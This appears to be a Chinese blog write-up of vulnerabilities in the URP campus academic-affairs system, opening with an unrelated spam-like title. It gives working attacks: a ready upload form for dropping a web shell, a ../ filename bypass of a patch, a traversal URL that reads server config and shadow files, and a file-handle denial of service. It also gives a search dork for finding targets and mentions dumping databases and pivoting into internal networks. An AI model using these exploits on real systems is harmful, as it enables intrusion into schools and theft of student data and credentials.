语言教学网站建设课程总结市场调研公司
在学校上了这么长时间,由于对课表选课的不习惯,就逐渐产生了对教务系统简单的了解,希望可以以此学习
本次测试版本:
参考:https://www.secpulse.com/archives/26974.html
漏洞类型 | 文件上传导致任意代码执行 |
|---|
直接POST数据过去 对lwUpLoad_action.jsp这个页面
开始分析:
首先,这个系统使用了Smartupload组件,先来看下lwUpLoad_action的部分源码。
<script language="javaScript" type="">//转向function doAction(type){document.forms[0].action="uploadLwywAction.do?actionType=upload&returnStr="+type;//alert(document.forms[0].action);document.forms[0].submit();}</script>
</head>
<body>
<form method="post" action="/uploadLwywAction" >
<%SmartUpload mySmartUpload = new SmartUpload();mySmartUpload.initialize(pageContext);mySmartUpload.upload(); //int fileSize=mySmartUpload.getSize();File file=mySmartUpload.getFiles().getFile(0);Request req=mySmartUpload.getRequest();//扩展名String fileExt=file.getFileExt();String realPath=request.getRealPath("/lwUpLoadTemp");String fileName=req.getParameter("xh")+"."+fileExt;String filePath=realPath+"/"+fileName;if(!file.isMissing()){file.saveAs("/lwUpLoadTemp/"+fileName,mySmartUpload.SAVE_VIRTUAL);}String returnStr=TestBean.uploadLwyw(filePath,req);//根据返回值 判断操作if(returnStr.equals("yes")){%><input type="hidden" name="zxjxjhh" value="<%=req.getParameter("zxjxjhh") %>"><input type="hidden" name="tmbh" value="<%=req.getParameter("tmbh") %>"><input type="hidden" name="xh" value="<%=req.getParameter("xh") %>"><script type="text/javascript">doAction("yes")</script><%}else if(returnStr.equals("full")){%><script type="text/javascript">doAction("full")</script><%}else {%><script type="text/javascript">doAction("error")</script><%}%>初步一看这个代码没啥问题吧,这个文件名使用学号命名的,也符合正常逻辑..继续看这个uploadlwyw.jsp的一部分代码,
function doUpload(){var chooseFile = null;var chooseFileType = null;//选择的文件类型var uploadlwyw = document.uploadLwywForm.theFile.value;var pos = uploadlwyw.lastIndexOf(".");var uploadlwywType = uploadlwyw.substring(pos + 1,uploadlwyw.length);//上传文件的类型if(uploadlwywType.toLowerCase()=="docx"){uploadlwywType = "doc";}//得到用户选择的文件类型for(var i=0;i<3;i++){if(document.uploadLwywForm.wjlx[i].checked){chooseFileType = document.uploadLwywForm.wjlx[i].value;if(chooseFileType == "doc"){chooseFile = "word";}if(chooseFileType == "pdf"){chooseFile = "pdf";}if(chooseFileType == "zip"){chooseFile = "latex";}}}//与上传的文件类型比较if(uploadlwywType.toLowerCase() != chooseFileType){alert("论文原文请上传" + chooseFile + "类型的文件!");return false;}if(document.uploadLwywForm.lwywwbb.value == "" && chooseFile == "word"){//版本判断alert("提交word类型的论文原文需添版本号!");document.uploadLwywForm.lwywwbb.focus();return false;}document.uploadLwywForm.action="lwUpLoad_action.jsp";document.uploadLwywForm.submit();}//改变上传文件类型function doChange(type){if(type != "word"){document.uploadLwywForm.lwywwbb.value ="";document.uploadLwywForm.lwywwbb.disabled = true;}else{document.uploadLwywForm.lwywwbb.disabled = false;}}这你妹这么重要的上传用js写不是打脸吗. ( js上传都写在后端,但是在这里就非常容易绕过前端js )
..在这里也没有限制上传类型,当然还得看后端的处理,别急,马上就来
看下UploadLwywAction 这是个java字节码,需要反编译成java源码 上传部分代码如下
String action = httpServletRequest.getParameter("actionType");if (action.equals("upload"))return upload(actionMapping, actionForm, httpServletRequest, httpServletResponse);public ActionForward upload(ActionMapping actionMapping, ActionForm actionForm, HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse){UploadLwywForm form;UploadLwywForm uploadLwywActionForm = (UploadLwywForm)actionForm;HttpSession session = httpServletRequest.getSession(false);UserInforVO userInfor = (UserInforVO)session.getAttribute("userInfor");form = (UploadLwywForm)actionForm;if (isSuccess.equals("yes")){String zxjxjhh = form.getZxjxjhh();String tmbh = form.getTmbh();String xh = form.getXh();LwLwxxbId lwLwxxbId = new LwLwxxbId(new LwXtb(new LwXtbId(new LwTmxxb(new LwTmxxbId(zxjxjhh, tmbh)), xh)));LwLwxxbLogic lwLwxxbLogic = new LwLwxxbLogic();LwLwxxb lwLwxxb = lwLwxxbLogic.getLwxxb(lwLwxxbId);}后端也没有处理 那就是没有限制了
这样这不是个任意文件上传吗...自己写个表单就好了...
<form action="http://x.x.x.x/lwUpLoad_action.jsp" method="post" enctype="multipart/form-data" ><input type="file" name="theFile" id="File"/><input type="text" name="xh" id="context"/><input type="submit" value="show me the shell" ></form>下面属于脱裤脚翘:
首先用这个表单上传一个shell
ssh反代会用,反代配全局继续内网渗透
参考:http://www.hackpanda.com/archives/212
漏洞类型 | URP教务系统拒绝服务 |
|---|
新补丁更新了几个filter,还有web根目录下的fileError.jsp存在这个文件的urp就存在这个拒绝服务,不存在这个文件的大部分可以getshell
Properties prop = new Properties();java.io.InputStream in = getClass().getResourceAsStream("/uploadfileFomat.properties");try{prop.load(in);}catch (IOException e1){System.out.println("获取允许文件类型出错");e1.printStackTrace();}String fomat = prop.getProperty("uploadfileFomat");读取properties后没有关闭文件句柄
通过burp多次访问后
然后主站整个404并且必须重启resin才能恢复通过lsof可以看到java的文件句柄已经达到800+
参考:http://www.hackpanda.com/archives/212
漏洞类型 | 补丁绕过&&继续无需登录GETSHELL |
|---|
升级的时候又把picFile那个过滤漏了
直接看下代码吧,主要还是在第一法getshell那里分析的多
String fileExt=file.getFileExt();String realPath=request.getRealPath("/lwUpLoadTemp");String fileName=req.getParameter("xh")+"."+fileExt;String filePath=realPath+"/"+fileName;if(!file.isMissing()){file.saveAs("/lwUpLoadTemp/"+fileName,mySmartUpload.SAVE_VIRTUAL); //fileName}String returnStr=TestBean.uploadLwyw(filePath,req);上段代码中fileName是doPost过来的,在这里没有过滤跨目录符号 ../ 所以还是用之前的表单即可完成上传 也就是
code 区域
file.saveAs("/lwUpLoadTemp/../sss.jsp")这样绕开了补丁限制,在根目录生成一个shell
参考:http://www.hackpanda.com/archives/212
漏洞类型 | 轻易读取数据库连接信息 |
|---|
漏洞实际是不需要登录的,而且可以轻易读取数据库连接信息,还有shadow,这就是这个漏洞的真正危害所在。
public void service(HttpServletRequest req, HttpServletResponse res){BufferedReader br;PrintWriter pw;br = null;pw = null;res.setContentType("text/html;charset=GBK");pw = res.getWriter();String filename = req.getParameter("file"); //直接取得filebr = new BufferedReader(new InputStreamReader(getClass().getResourceAsStream(filename), "GBK"));String s;while ((s = br.readLine()) != null)pw.print(s + "\n");Exception e;构造http://x.x.x.x/servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../../conf/resin.conf
特征为 intitle:urp综合教务系统-登录
shadow
以上就是对urp系统的利用,转自panda博客,
以上仅供学习参考,严禁触犯法律法规